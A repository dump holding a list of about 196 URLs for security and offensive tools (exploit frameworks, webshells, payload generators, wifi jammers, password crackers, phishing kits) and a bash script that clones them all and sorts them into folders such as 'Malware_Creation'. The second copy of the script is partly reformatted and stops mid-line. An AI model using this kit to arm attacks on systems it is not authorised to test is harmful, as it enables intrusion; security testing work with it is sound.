| https://github.com/WhiteMatt3r/Skype-Tool 185 | https://github.com/wi-fi-analyzer/mdk3-master 186 | https://github.com/wick2o/gitdigger 187 | https://github.com/wiire/pixiewps 188 | https://github.com/wireghoul/dotdotpwn 189 | https://github.com/wpscanteam/wpscan 190 | https://github.com/x3omdax/PenBox 191 | https://github.com/yaph/domxssscanner 192 | https://github.com/ysrc/F-Scrack 
193 | https://github.com/zennro/fbht-linux 194 | https://github.com/zeroq/amun 195 | https://github.com/zscproject/OWASP-ZSC 196 | https://www.kismetwireless.net/kismet.git 197 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/download-tools-hacking/list.txt: -------------------------------------------------------------------------------- 1 | git://git.kali.org/packages/ace-voip.git 2 | git://git.kali.org/packages/amap.git 3 | git://git.kali.org/packages/cisco-auditing-tool.git 4 | git://git.kali.org/packages/cisco-global-exploiter.git 5 | git://git.kali.org/packages/cisco-ocs.git 6 | git://git.kali.org/packages/cisco-torch.git 7 | https://bitbucket.org/LaNMaSteR53/recon-ng 8 | https://github.com/0xd4d/dnSpy 9 | https://github.com/1aN0rmus/TekDefense-Automater 10 | https://github.com/1N3/Findsploit 11 | https://github.com/1N3/Sn1per 12 | https://github.com/4shadoww/hakkuframework 13 | https://github.com/adaptivethreat/Empire 14 | https://github.com/AeonDave/doork 15 | https://github.com/aircrack-ng/aircrack-ng 16 | https://github.com/ajinabraham/Mobile-Security-Framework-MobSF 17 | https://github.com/AlisamTechnology/ATSCAN 18 | https://github.com/allfro/sploitego 19 | https://github.com/andresriancho/w3af 20 | https://github.com/aol/moloch 21 | https://github.com/appknox/AFE 22 | https://github.com/Arachni/arachni 23 | https://github.com/Aralhach/bashobfus 24 | https://github.com/b3mb4m/shellsploit-framework 25 | https://github.com/bartobri/no-more-secrets 26 | https://github.com/beefproject/beef 27 | https://github.com/BlackArch/rainbowcrack 28 | https://github.com/blindfuzzy/LHF 29 | https://github.com/bounteous/libenom 30 | https://github.com/BRDumps/extract-hashes 31 | https://github.com/BreakingMalwareResearch/atom-bombing 32 | https://github.com/byt3bl33d3r/chrome-decrypter 33 | https://github.com/byt3bl33d3r/pth-toolkit 34 | https://github.com/certsocietegenerale/FIR 35 | https://github.com/certtools/intelmq 
36 | https://github.com/Cewlt/SkypeMass 37 | https://github.com/chaitin/sqlchop 38 | https://github.com/chinoogawa/fbht 39 | https://github.com/cloughrm/Pastebin-Scraper 40 | https://github.com/commixproject/commix 41 | https://github.com/cxdy/pybomber 42 | https://github.com/D35m0nd142/Kadabra 43 | https://github.com/danielmiessler/SecLists 44 | https://github.com/DanMcInerney/shellshock-hunter 45 | https://github.com/DanMcInerney/shellshock-hunter-google 46 | https://github.com/DanMcInerney/wifijammer 47 | https://github.com/darkoperator/dnsrecon 48 | https://github.com/ddos-defense/bohatei 49 | https://github.com/desaster/kippo 50 | https://github.com/devttys0/binwalk 51 | https://github.com/digininja/CeWL 52 | https://github.com/Dionach/CMSmap 53 | https://github.com/dloss/python-pentest-tools 54 | https://github.com/DoddyHackman/Arsenal_X 55 | https://github.com/DominikSchlecht/pyDirBuster 56 | https://github.com/dotfighter/torshammer 57 | https://github.com/dripcap/dripcap 58 | https://github.com/EgeBalci/The-Eye 59 | https://github.com/EnableSecurity/wafw00f 60 | https://github.com/endgameinc/binarypig 61 | https://github.com/epinna/weevely3 62 | https://github.com/Ettercap/ettercap 63 | https://github.com/evilsocket/bettercap 64 | https://github.com/ex0dus-0x/brut3k1t 65 | https://github.com/ex0dus-0x/dedsploit 66 | https://github.com/fgeek/pyfiscan 67 | https://github.com/foospidy/HoneyPy 68 | https://github.com/frdmn/findmyhash 69 | https://github.com/g0tmi1k/mpc 70 | https://github.com/gabrielrcouto/reaver-wps 71 | https://github.com/Gallopsled/pwntools 72 | https://github.com/gamelinux/passivedns 73 | https://github.com/GDSSecurity/Windows-Exploit-Suggester 74 | https://github.com/georgiaw/Smartphone-Pentest-Framework 75 | https://github.com/google/grr 76 | https://github.com/google/rowhammer-test 77 | https://github.com/google/stenographer 78 | https://github.com/googleinurl/SCANNER-INURLBR 79 | https://github.com/GouveaHeitor/nipe 80 | 
https://github.com/graniet/chromebackdoor 81 | https://github.com/HackerOrientado/BypassCF 82 | https://github.com/hahwul/droid-hunter 83 | https://github.com/hashcat/hashcat 84 | https://github.com/hatRiot/clusterd 85 | https://github.com/hatRiot/zarp 86 | https://github.com/hellman/xortool 87 | https://github.com/HiroshiManRise/anonym8 88 | https://github.com/Hood3dRob1n/BinGoo 89 | https://github.com/huntergregal/scansploit 90 | https://github.com/hvqzao/liffy 91 | https://github.com/Hypsurus/weeman 92 | https://github.com/infobyte/evilgrade 93 | https://github.com/j91321/rext 94 | https://github.com/jaromil/HasciiCam 95 | https://github.com/jh00nbr/Routerhunter-2.0 96 | https://github.com/JoeDog/siege 97 | https://github.com/JohnTroony/php-webshells 98 | https://github.com/JPaulMora/Pyrit 99 | https://github.com/jsvine/waybackpack 100 | https://github.com/juansacco/exploitpack 101 | https://github.com/Jumpst3r/AsciiToDucky 102 | https://github.com/k4m4/onioff 103 | https://github.com/kevthehermit/dc-toolkit 104 | https://github.com/kevthehermit/RATDecoders 105 | https://github.com/knownsec/Pocsuite 106 | https://github.com/korczis/foremost 107 | https://github.com/kurobeats/fimap 108 | https://github.com/lanjelot/patator 109 | https://github.com/leebaird/discover 110 | https://github.com/lhr0909/PythonObfuscator 111 | https://github.com/liftoff/pyminifier 112 | https://github.com/lightbulb-framework/lightbulb-framework 113 | https://github.com/luisgg/ophcrack 114 | https://github.com/m0nad/HellRaiser/ 115 | https://github.com/m3pt0r/l0l 116 | https://github.com/magnumripper/JohnTheRipper 117 | https://github.com/marshyski/sshwatch 118 | https://github.com/merculite/BLE-Security 119 | https://github.com/micahflee/onionshare 120 | https://github.com/mikeryan/crackle 121 | https://github.com/misterch0c/malSploitBase 122 | https://github.com/mitmproxy/mitmproxy 123 | https://github.com/mthbernardes/EvilTool 124 | https://github.com/nbs-system/naxsi 125 | 
https://github.com/nmap/nmap 126 | https://github.com/NORMA-Inc/AtEar 127 | https://github.com/OsandaMalith/LFiFreak/ 128 | https://github.com/P0cL4bs/Kadimus 129 | https://github.com/ParrotSec/car-hacking-tools 130 | https://github.com/PenturaLabs/Linux_Exploit_Suggester 131 | https://github.com/praetorian-inc/Hob0Rules 132 | https://github.com/psypanda/hashID 133 | https://github.com/r00t-3xp10it/morpheus 134 | https://github.com/radare/radare2 135 | https://github.com/rafael-santiago/pig 136 | https://github.com/ReclaimYourPrivacy/eschalot 137 | https://github.com/reverse-shell/routersploit 138 | https://github.com/reyammer/shellnoob 139 | https://github.com/rezasp/joomscan 140 | https://github.com/rezasp/vbscan 141 | https://github.com/rfunix/Pompem 142 | https://github.com/rsmudge/armitage 143 | https://github.com/s3inlc/holm 144 | https://github.com/SafeStack/ava 145 | https://github.com/SageHack/cloud-buster 146 | https://github.com/SageHack/cloudflare-resolver 147 | https://github.com/samratashok/Kautilya 148 | https://github.com/samratashok/nishang 149 | https://github.com/savio-code/ghost-phisher 150 | https://github.com/Screetsec/Brutal 151 | https://github.com/Screetsec/Dracnmap 152 | https://github.com/Screetsec/TheFatRat 153 | https://github.com/SECFORCE/sparta 154 | https://github.com/secretsquirrel/the-backdoor-factory/ 155 | https://github.com/securestate/termineter 156 | https://github.com/seifreed/dirb 157 | https://github.com/sensepost/DET 158 | https://github.com/sensepost/kwetza 159 | https://github.com/sensepost/xrdp 160 | https://github.com/shawarkhanethicalhacker/D-TECT 161 | https://github.com/simsong/tcpflow 162 | https://github.com/sleuthkit/autopsy 163 | https://github.com/sleuthkit/sleuthkit 164 | https://github.com/sophron/wifiphisher 165 | https://github.com/SpiderLabs/jboss-autopwn 166 | https://github.com/suraj-root/spade 167 | https://github.com/tcstool/fireaway 168 | https://github.com/tcstool/NoSQLMap 169 | 
https://github.com/TheRook/subbrute 170 | https://github.com/thesp0nge/dawnscanner 171 | https://github.com/timwr/CVE-2016-5195 172 | https://github.com/tnich/honssh 173 | https://github.com/tomac/yersinia 174 | https://github.com/trustedsec/ptf 175 | https://github.com/TryCatchHCF/Cloakify 176 | https://github.com/ufrisk/pcileech 177 | https://github.com/urbanadventurer/WhatWeb 178 | https://github.com/USArmyResearchLab/Dshell 179 | https://github.com/v3n0m-Scanner/V3n0M-Scanner 180 | https://github.com/vk496/linset 181 | https://github.com/volatilityfoundation/volatility 182 | https://github.com/vusec/drammer 183 | https://github.com/vvalien/SharpMeter 184 | https://github.com/WhiteMatt3r/Skype-Tool 185 | https://github.com/wi-fi-analyzer/mdk3-master 186 | https://github.com/wick2o/gitdigger 187 | https://github.com/wiire/pixiewps 188 | https://github.com/wireghoul/dotdotpwn 189 | https://github.com/wpscanteam/wpscan 190 | https://github.com/x3omdax/PenBox 191 | https://github.com/yaph/domxssscanner 192 | https://github.com/ysrc/F-Scrack 193 | https://github.com/zennro/fbht-linux 194 | https://github.com/zeroq/amun 195 | https://github.com/zscproject/OWASP-ZSC 196 | https://www.kismetwireless.net/kismet.git 197 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/Download_Script.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Installer script. 3 | 4 | #Yes/No prompt. 5 | read -p "This script will install all of the tools included in list.txt - Do you wanna install them to your current directory? [Y/n] " -n 1 -r 6 | echo 7 | if [[ ! $REPLY =~ ^[Yy]$ ]] 8 | then 9 | [[ "$0" = "$BASH_SOURCE" ]] && exit 1 || return 1 # handle exits from shell or function but doesn't exit the interactive shell. 10 | fi 11 | 12 | #Checks for git. 13 | command -v git >/dev/null 2>&1 || { echo >&2 "You don't have git. 
Run 'apt-get install git' first."; exit 1; } 14 | 15 | #Clones tools from pack. 16 | for i in `cat list.txt`; do git clone --quiet "$i" && echo "$i downloaded successfully."; done 17 | 18 | #Tells the user what the script is doing. 19 | echo "Creating Catagorized folders..." 20 | 21 | #Makes directories. 22 | mkdir "Forensics" 23 | mkdir "General_Exploitation" 24 | mkdir "Hardware_Related" 25 | mkdir "Cracking" 26 | mkdir "Malware_Creation" 27 | mkdir "MitM" 28 | mkdir "Other" 29 | mkdir "Reverse_Engineering" 30 | mkdir "Stress_Testing" 31 | mkdir "Web_Server_Exploitation" 32 | mkdir "Wireless_Exploitation" 33 | 34 | #Tells the user what the script is doing. 35 | echo "Moving tools into said folders..." 36 | 37 | #Moves the tools to the correct folders. 38 | mv "ace-voip/" "MitM/" 39 | mv "AFE/" "Hardware_Related/" 40 | mv "aircrack-ng/" "Wireless_Exploitation/" 41 | mv "amap/" "Other/" 42 | mv "amun/" "MitM/" 43 | mv "arachni/" "Web_Server_Exploitation/" 44 | mv "armitage/" "General_Exploitation/" 45 | mv "Arsenal_X/" "Other/" 46 | mv "AsciiToDucky/" "Hardware_Related/" 47 | mv "AtEar/" "Wireless_Exploitation/" 48 | mv "atom-bombing/" "Malware_Creation/" 49 | mv "ATSCAN/" "Web_Server_Exploitation/" 50 | mv "autopsy/" "Forensics/" 51 | mv "ava/" "General_Exploitation/" 52 | mv "bashobfus/" "Other/" 53 | mv "beef/" "General_Exploitation/" 54 | mv "bettercap/" "MitM/" 55 | mv "binarypig/" "Reverse_Engineering/" 56 | mv "BinGoo/" "Web_Server_Exploitation/" 57 | mv "binwalk/" "Reverse_Engineering/" 58 | mv "BLE-Security/" "Hardware_Related/" 59 | mv "bohatei/" "Stress_Testing/" 60 | mv "brut3k1t/" "Cracking/" 61 | mv "Brutal/" "Hardware_Related/" 62 | mv "BypassCF/" "Web_Server_Exploitation/" 63 | mv "car-hacking-tools/" "Hardware_Related/" 64 | mv "CeWL/" "Cracking/" 65 | mv "chrome-decrypter/" "Cracking/" 66 | mv "chromebackdoor/" "Malware_Creation/" 67 | mv "cisco-auditing-tool/" "Hardware_Related/" 68 | mv "cisco-global-exploiter/" "Hardware_Related/" 69 | mv 
"cisco-ocs/" "Hardware_Related/" 70 | mv "cisco-torch/" "Hardware_Related/" 71 | mv "Cloakify/" "Malware_Creation/" 72 | mv "cloud-buster/" "Web_Server_Exploitation/" 73 | mv "cloudflare-resolver/" "Web_Server_Exploitation/" 74 | mv "clusterd/" "General_Exploitation/" 75 | mv "CMSmap/" "Web_Server_Exploitation/" 76 | mv "commix/" "Web_Server_Exploitation/" 77 | mv "crackle/" "Wireless_Exploitation/" 78 | mv "CVE-2016-5195/" "Hardware_Related/" 79 | mv "D-TECT/" "General_Exploitation/" 80 | mv "dawnscanner/" "Web_Server_Exploitation/" 81 | mv "dc-toolkit/" "Reverse_Engineering/" 82 | mv "dedsploit/" "General_Exploitation/" 83 | mv "DET/" "Other/" 84 | mv "dirb/" "Web_Server_Exploitation/" 85 | mv "discover/" "General_Exploitation/" 86 | mv "dnSpy/" "Reverse_Engineering/" 87 | mv "dnsrecon/" "Web_Server_Exploitation/" 88 | mv "domxssscanner/" "Web_Server_Exploitation/" 89 | mv "doork/" "Web_Server_Exploitation/" 90 | mv "dotdotpwn/" "Web_Server_Exploitation/" 91 | mv "Dracnmap/" "General_Exploitation/" 92 | mv "drammer/" "Hardware_Related/" 93 | mv "dripcap/" "MitM/" 94 | mv "droid-hunter/" "Hardware_Related/" 95 | mv "Dshell/" "Forensics/" 96 | mv "Empire/" "Malware_Creation/" 97 | mv "eschalot/" "Other/" 98 | mv "ettercap/" "MitM/" 99 | mv "evilgrade/" "MitM/" 100 | mv "EvilTool/" "Web_Server_Exploitation/" 101 | mv "exploitpack/" "General_Exploitation/" 102 | mv "extract-hashes/" "Cracking/" 103 | mv "F-Scrack/" "General_Exploitation/" 104 | mv "fbht-linux/" "Other/" 105 | mv "fbht/" "Other/" 106 | mv "fimap/" "Web_Server_Exploitation/" 107 | mv "findmyhash/" "Cracking/" 108 | mv "Findsploit/" "Other/" 109 | mv "FIR/" "Other/" 110 | mv "fireaway/" "General_Exploitation/" 111 | mv "foremost/" "Forensics/" 112 | mv "ghost-phisher/" "MitM/" 113 | mv "gitdigger/" "Cracking/" 114 | mv "grr/" "Forensics/" 115 | mv "hakkuframework/" "General_Exploitation/" 116 | mv "HasciiCam/" "Other/" 117 | mv "hashcat/" "Cracking/" 118 | mv "hashID/" "Cracking/" 119 | mv "HellRaiser/" 
"Web_Server_Exploitation/" 120 | mv "Hob0Rules/" "Cracking/" 121 | mv "holm/" "Cracking/" 122 | mv "HoneyPy/" "MitM/" 123 | mv "honssh/" "MitM/" 124 | mv "intelmq/" "Other/" 125 | mv "jboss-autopwn/" "General_Exploitation/" 126 | mv "JohnTheRipper/" "Cracking/" 127 | mv "joomscan/" "Web_Server_Exploitation/" 128 | mv "Kadabra/" "Web_Server_Exploitation/" 129 | mv "Kadimus/" "Web_Server_Exploitation/" 130 | mv "Kautilya/" "General_Exploitation/" 131 | mv "kippo/" "MitM/" 132 | mv "kismet/" "Wireless_Exploitation/" 133 | mv "kwetza/" "Malware_Creation/" 134 | mv "l0l/" "General_Exploitation/" 135 | mv "LFiFreak/" "Web_Server_Exploitation/" 136 | mv "LHF/" "General_Exploitation/" 137 | mv "libenom/" "Malware_Creation/" 138 | mv "liffy/" "Web_Server_Exploitation/" 139 | mv "lightbulb-framework/" "Web_Server_Exploitation/" 140 | mv "linset/" "Wireless_Exploitation/" 141 | mv "Linux_Exploit_Suggester/" "Other/" 142 | mv "malSploitBase/" "Reverse_Engineering/" 143 | mv "mdk3-master/" "Wireless_Exploitation/" 144 | mv "metasploit-framework/" "General_Exploitation/" 145 | mv "mimikatz/" "General_Exploitation/" 146 | mv "mitmproxy/" "MitM/" 147 | mv "Mobile-Security-Framework-MobSF/" "Hardware_Related/" 148 | mv "moloch/" "MitM/" 149 | mv "morpheus/" "MitM/" 150 | mv "mpc/" "Malware_Creation/" 151 | mv "naxsi/" "Other/" 152 | mv "nipe/" "Other/" 153 | mv "nishang/" "Malware_Creation/" 154 | mv "nmap/" "General_Exploitation/" 155 | mv "no-more-secrets/" "Other/" 156 | mv "NoSQLMap/" "Web_Server_Exploitation/" 157 | mv "onioff/" "Other/" 158 | mv "onionshare/" "Other/" 159 | mv "ophcrack/" "Cracking/" 160 | mv "OWASP-ZSC/" "Malware_Creation/" 161 | mv "passivedns/" "MitM/" 162 | mv "Pastebin-Scraper/" "Other/" 163 | mv "patator/" "General_Exploitation/" 164 | mv "pcileech/" "Hardware_Related/" 165 | mv "PenBox/" "General_Exploitation/" 166 | mv "php-webshells/" "Web_Server_Exploitation/" 167 | mv "pig/" "Other/" 168 | mv "pixiewps/" "Wireless_Exploitation/" 169 | mv 
"Pocsuite/" "Web_Server_Exploitation/" 170 | mv "Pompem/" "Other/" 171 | mv "ptf/" "General_Exploitation/" 172 | mv "pth-toolkit/" "Cracking/" 173 | mv "pwndsh/" "General_Exploitation/" 174 | mv "pwntools/" "Other/" 175 | mv "pybomber/" "Other/" 176 | mv "pyDirBuster/" "Web_Server_Exploitation/" 177 | mv "pyfiscan/" "Web_Server_Exploitation/" 178 | mv "pyminifier/" "Other/" 179 | mv "Pyrit/" "Wireless_Exploitation/" 180 | mv "python-pentest-tools/" "General_Exploitation/" 181 | mv "PythonObfuscator/" "Other/" 182 | mv "radare2/" "Reverse_Engineering/" 183 | mv "rainbowcrack/" "Cracking/" 184 | mv "RATDecoders/" "Reverse_Engineering/" 185 | mv "reaver-wps/" "Wireless_Exploitation/" 186 | mv "recon-ng/" "Other/" 187 | mv "rext/" "Hardware_Related" 188 | mv "Routerhunter-2.0/" "Hardware_Related/" 189 | mv "routersploit/" "Hardware_Related/" 190 | mv "rowhammer-test/" "Other/" 191 | mv "SCANNER-INURLBR/" "Web_Server_Exploitation/" 192 | mv "scansploit/" "Other/" 193 | mv "SecLists/" "Other/" 194 | mv "SharpMeter/" "Malware_Creation/" 195 | mv "shellnoob/" "Malware_Creation/" 196 | mv "shellshock-hunter-google/" "Web_Server_Exploitation/" 197 | mv "shellshock-hunter/" "Web_Server_Exploitation/" 198 | mv "shellsploit-framework/" "Malware_Creation/" 199 | mv "siege/" "Stress_Testing/" 200 | mv "Skype-Tool/" "Other/" 201 | mv "SkypeMass/" "Other/" 202 | mv "sleuthkit/" "Forensics/" 203 | mv "Smartphone-Pentest-Framework/" "Hardware_Related/" 204 | mv "Sn1per/" "Web_Server_Exploitation/" 205 | mv "social-engineer-toolkit/" "General_Exploitation/" 206 | mv "spade/" "Malware_Creation/" 207 | mv "sparta/" "General_Exploitation/" 208 | mv "spiderfoot/" "Web_Server_Exploitation/" 209 | mv "sploitego/" "Other/" 210 | mv "sqlchop/" "Other/" 211 | mv "sqlmap/" "Web_Server_Exploitation/" 212 | mv "sshwatch/" "MitM/" 213 | mv "stenographer/" "MitM/" 214 | mv "subbrute/" "Web_Server_Exploitation/" 215 | mv "tcpflow/" "MitM/" 216 | mv "TekDefense-Automater/" "Web_Server_Exploitation/" 
217 | mv "termineter/" "Hardware_Related/" 218 | mv "the-backdoor-factory/" "Malware_Creation/" 219 | mv "The-Eye/" "Other/" 220 | mv "TheFatRat/" "Malware_Creation/" 221 | mv "torshammer/" "Stress_Testing/" 222 | mv "V3n0M-Scanner/" "Web_Server_Exploitation/" 223 | mv "vbscan/" "Web_Server_Exploitation/" 224 | mv "Veil-Evasion/" "Malware_Creation/" 225 | mv "volatility/" "Forensics/" 226 | mv "w3af/" "Web_Server_Exploitation/" 227 | mv "wafw00f/" "Web_Server_Exploitation/" 228 | mv "waybackpack/" "Other/" 229 | mv "weeman/" "Web_Server_Exploitation/" 230 | mv "weevely3/" "Web_Server_Exploitation/" 231 | mv "WhatWeb/" "Web_Server_Exploitation/" 232 | mv "wifijammer/" "Wireless_Exploitation/" 233 | mv "wifiphisher/" "Wireless_Exploitation/" 234 | mv "wifite/" "Wireless_Exploitation/" 235 | mv "Windows-Exploit-Suggester/" "Other/" 236 | mv "wpscan/" "Web_Server_Exploitation/" 237 | mv "xortool/" "Reverse_Engineering/" 238 | mv "xrdp/" "General_Exploitation/" 239 | mv "yersinia/" "Stress_Testing/" 240 | mv "zarp/" "General_Exploitation/" 241 | 242 | 243 | echo "Finished!" 244 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/download-tools-hacking/Download_Script.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Installer script. 3 | 4 | #Yes/No prompt. 5 | read -p "This script will install all of the tools included in list.txt - Do you wanna install them to your current directory? [Y/n] " -n 1 -r 6 | echo 7 | if [[ ! $REPLY =~ ^[Yy]$ ]] 8 | then 9 | [[ "$0" = "$BASH_SOURCE" ]] && exit 1 || return 1 # handle exits from shell or function but doesn't exit the interactive shell. 10 | fi 11 | 12 | #Checks for git. 13 | command -v git >/dev/null 2>&1 || { echo >&2 "You don't have git. Run 'apt-get install git' first."; exit 1; } 14 | 15 | #Clones tools from pack. 
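#Each clone is the remote's default branch at its current commit: nothing is
#pinned to a revision or verified after download.
#list.txt is read line by line instead of word-splitting `cat` output, so an
#entry is never glob-expanded. "--" ends option parsing, so an entry that
#starts with "-" is taken as a repository URL and never as a git option.
while read -r i || [[ -n "$i" ]]; do
    #Skips blank lines.
    [[ -z "$i" ]] && continue
    git clone --quiet -- "$i" && echo "$i downloaded successfully."
done < list.txt

#Tells the user what the script is doing.
echo "Creating Catagorized folders..."

#Makes directories. -p keeps a second run from failing on folders that exist.
mkdir -p \
    "Forensics" \
    "General_Exploitation" \
    "Hardware_Related" \
    "Cracking" \
    "Malware_Creation" \
    "MitM" \
    "Other" \
    "Reverse_Engineering" \
    "Stress_Testing" \
    "Web_Server_Exploitation" \
    "Wireless_Exploitation"

#Tells the user what the script is doing.
echo "Moving tools into said folders..."

#Moves the tools to the correct folders.
mv "ace-voip/" "MitM/"
mv "AFE/" "Hardware_Related/"
mv "aircrack-ng/" "Wireless_Exploitation/"
mv "amap/" "Other/"
mv "amun/" "MitM/"
mv "arachni/" "Web_Server_Exploitation/"
mv "armitage/" "General_Exploitation/"
mv "Arsenal_X/" "Other/"
mv "AsciiToDucky/" "Hardware_Related/"
mv "AtEar/" "Wireless_Exploitation/"
mv "atom-bombing/" "Malware_Creation/"
mv "ATSCAN/" "Web_Server_Exploitation/"
mv "autopsy/" "Forensics/"
mv "ava/" "General_Exploitation/"
mv "bashobfus/" "Other/"
mv "beef/" "General_Exploitation/"
mv "bettercap/" "MitM/"
mv "binarypig/" "Reverse_Engineering/"
mv "BinGoo/" "Web_Server_Exploitation/"
mv "binwalk/" "Reverse_Engineering/"
mv "BLE-Security/" "Hardware_Related/"
mv "bohatei/" "Stress_Testing/"
mv "brut3k1t/" "Cracking/"
mv "Brutal/" "Hardware_Related/"
mv "BypassCF/" "Web_Server_Exploitation/"
mv "car-hacking-tools/" "Hardware_Related/"
mv "CeWL/" "Cracking/"
mv "chrome-decrypter/" "Cracking/"
mv "chromebackdoor/" "Malware_Creation/"
mv "cisco-auditing-tool/" "Hardware_Related/"
mv "cisco-global-exploiter/" "Hardware_Related/"
mv "cisco-ocs/" "Hardware_Related/"
mv "cisco-torch/" "Hardware_Related/"
mv 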
"Cloakify/" "Malware_Creation/" 72 | mv "cloud-buster/" "Web_Server_Exploitation/" 73 | mv "cloudflare-resolver/" "Web_Server_Exploitation/" 74 | mv "clusterd/" "General_Exploitation/" 75 | mv "CMSmap/" "Web_Server_Exploitation/" 76 | mv "commix/" "Web_Server_Exploitation/" 77 | mv "crackle/" "Wireless_Exploitation/" 78 | mv "CVE-2016-5195/" "Hardware_Related/" 79 | mv "D-TECT/" "General_Exploitation/" 80 | mv "dawnscanner/" "Web_Server_Exploitation/" 81 | mv "dc-toolkit/" "Reverse_Engineering/" 82 | mv "dedsploit/" "General_Exploitation/" 83 | mv "DET/" "Other/" 84 | mv "dirb/" "Web_Server_Exploitation/" 85 | mv "discover/" "General_Exploitation/" 86 | mv "dnSpy/" "Reverse_Engineering/" 87 | mv "dnsrecon/" "Web_Server_Exploitation/" 88 | mv "domxssscanner/" "Web_Server_Exploitation/" 89 | mv "doork/" "Web_Server_Exploitation/" 90 | mv "dotdotpwn/" "Web_Server_Exploitation/" 91 | mv "Dracnmap/" "General_Exploitation/" 92 | mv "drammer/" "Hardware_Related/" 93 | mv "dripcap/" "MitM/" 94 | mv "droid-hunter/" "Hardware_Related/" 95 | mv "Dshell/" "Forensics/" 96 | mv "Empire/" "Malware_Creation/" 97 | mv "eschalot/" "Other/" 98 | mv "ettercap/" "MitM/" 99 | mv "evilgrade/" "MitM/" 100 | mv "EvilTool/" "Web_Server_Exploitation/" 101 | mv "exploitpack/" "General_Exploitation/" 102 | mv "extract-hashes/" "Cracking/" 103 | mv "F-Scrack/" "General_Exploitation/" 104 | mv "fbht-linux/" "Other/" 105 | mv "fbht/" "Other/" 106 | mv "fimap/" "Web_Server_Exploitation/" 107 | mv "findmyhash/" "Cracking/" 108 | mv "Findsploit/" "Other/" 109 | mv "FIR/" "Other/" 110 | mv "fireaway/" "General_Exploitation/" 111 | mv "foremost/" "Forensics/" 112 | mv "ghost-phisher/" "MitM/" 113 | mv "gitdigger/" "Cracking/" 114 | mv "grr/" "Forensics/" 115 | mv "hakkuframework/" "General_Exploitation/" 116 | mv "HasciiCam/" "Other/" 117 | mv "hashcat/" "Cracking/" 118 | mv "hashID/" "Cracking/" 119 | mv "HellRaiser/" "Web_Server_Exploitation/" 120 | mv "Hob0Rules/" "Cracking/" 121 | mv "holm/" 
"Cracking/" 122 | mv "HoneyPy/" "MitM/" 123 | mv "honssh/" "MitM/" 124 | mv "intelmq/" "Other/" 125 | mv "jboss-autopwn/" "General_Exploitation/" 126 | mv "JohnTheRipper/" "Cracking/" 127 | mv "joomscan/" "Web_Server_Exploitation/" 128 | mv "Kadabra/" "Web_Server_Exploitation/" 129 | mv "Kadimus/" "Web_Server_Exploitation/" 130 | mv "Kautilya/" "General_Exploitation/" 131 | mv "kippo/" "MitM/" 132 | mv "kismet/" "Wireless_Exploitation/" 133 | mv "kwetza/" "Malware_Creation/" 134 | mv "l0l/" "General_Exploitation/" 135 | mv "LFiFreak/" "Web_Server_Exploitation/" 136 | mv "LHF/" "General_Exploitation/" 137 | mv "libenom/" "Malware_Creation/" 138 | mv "liffy/" "Web_Server_Exploitation/" 139 | mv "lightbulb-framework/" "Web_Server_Exploitation/" 140 | mv "linset/" "Wireless_Exploitation/" 141 | mv "Linux_Exploit_Suggester/" "Other/" 142 | mv "malSploitBase/" "Reverse_Engineering/" 143 | mv "mdk3-master/" "Wireless_Exploitation/" 144 | mv "metasploit-framework/" "General_Exploitation/" 145 | mv "mimikatz/" "General_Exploitation/" 146 | mv "mitmproxy/" "MitM/" 147 | mv "Mobile-Security-Framework-MobSF/" "Hardware_Related/" 148 | mv "moloch/" "MitM/" 149 | mv "morpheus/" "MitM/" 150 | mv "mpc/" "Malware_Creation/" 151 | mv "naxsi/" "Other/" 152 | mv "nipe/" "Other/" 153 | mv "nishang/" "Malware_Creation/" 154 | mv "nmap/" "General_Exploitation/" 155 | mv "no-more-secrets/" "Other/" 156 | mv "NoSQLMap/" "Web_Server_Exploitation/" 157 | mv "onioff/" "Other/" 158 | mv "onionshare/" "Other/" 159 | mv "ophcrack/" "Cracking/" 160 | mv "OWASP-ZSC/" "Malware_Creation/" 161 | mv "passivedns/" "MitM/" 162 | mv "Pastebin-Scraper/" "Other/" 163 | mv "patator/" "General_Exploitation/" 164 | mv "pcileech/" "Hardware_Related/" 165 | mv "PenBox/" "General_Exploitation/" 166 | mv "php-webshells/" "Web_Server_Exploitation/" 167 | mv "pig/" "Other/" 168 | mv "pixiewps/" "Wireless_Exploitation/" 169 | mv "Pocsuite/" "Web_Server_Exploitation/" 170 | mv "Pompem/" "Other/" 171 | mv "ptf/" 
"General_Exploitation/" 172 | mv "pth-toolkit/" "Cracking/" 173 | mv "pwndsh/" "General_Exploitation/" 174 | mv "pwntools/" "Other/" 175 | mv "pybomber/" "Other/" 176 | mv "pyDirBuster/" "Web_Server_Exploitation/" 177 | mv "pyfiscan/" "Web_Server_Exploitation/" 178 | mv "pyminifier/" "Other/" 179 | mv "Pyrit/" "Wireless_Exploitation/" 180 | mv "python-pentest-tools/" "General_Exploitation/" 181 | mv "PythonObfuscator/" "Other/" 182 | mv "radare2/" "Reverse_Engineering/" 183 | mv "rainbowcrack/" "Cracking/" 184 | mv "RATDecoders/" "Reverse_Engineering/" 185 | mv "reaver-wps/" "Wireless_Exploitation/" 186 | mv "recon-ng/" "Other/" 187 | mv "rext/" "Hardware_Related" 188 | mv "Routerhunter-2.0/" "Hardware_Related/" 189 | mv "routersploit/" "Hardware_Related/" 190 | mv "rowhammer-test/" "Other/" 191 | mv "SCANNER-INURLBR/" "Web_Server_Exploitation/" 192 | mv "scansploit/" "Other/" 193 | mv "SecLists/" "Other/" 194 | mv "SharpMeter/" "Malware_Creation/" 195 | mv "shellnoob/" "Malware_Creation/" 196 | mv "shellshock-hunter-google/" "Web_Server_Exploitation/" 197 | mv "shellshock-hunter/" "Web_Server_Exploitation/" 198 | mv "shellsploit-framework/" "Malware_Creation/" 199 | mv "siege/" "Stress_Testing/" 200 | mv "Skype-Tool/" "Other/" 201 | mv "SkypeMass/" "Other/" 202 | mv "sleuthkit/" "Forensics/" 203 | mv "Smartphone-Pentest-Framework/" "Hardware_Related/" 204 | mv "Sn1per/" "Web_Server_Exploitation/" 205 | mv "social-engineer-toolkit/" "General_Exploitation/" 206 | mv "spade/" "Malware_Creation/" 207 | mv "sparta/" "General_Exploitation/" 208 | mv "spiderfoot/" "Web_Server_Exploitation/" 209 | mv "sploitego/" "Other/" 210 | mv "sqlchop/" "Other/" 211 | mv "sqlmap/" "Web_Server_Exploitation/" 212 | mv "sshwatch/" "MitM/" 213 | mv "stenographer/" "MitM/" 214 | mv "subbrute/" "Web_Server_Exploitation/" 215 | mv "tcpflow/" 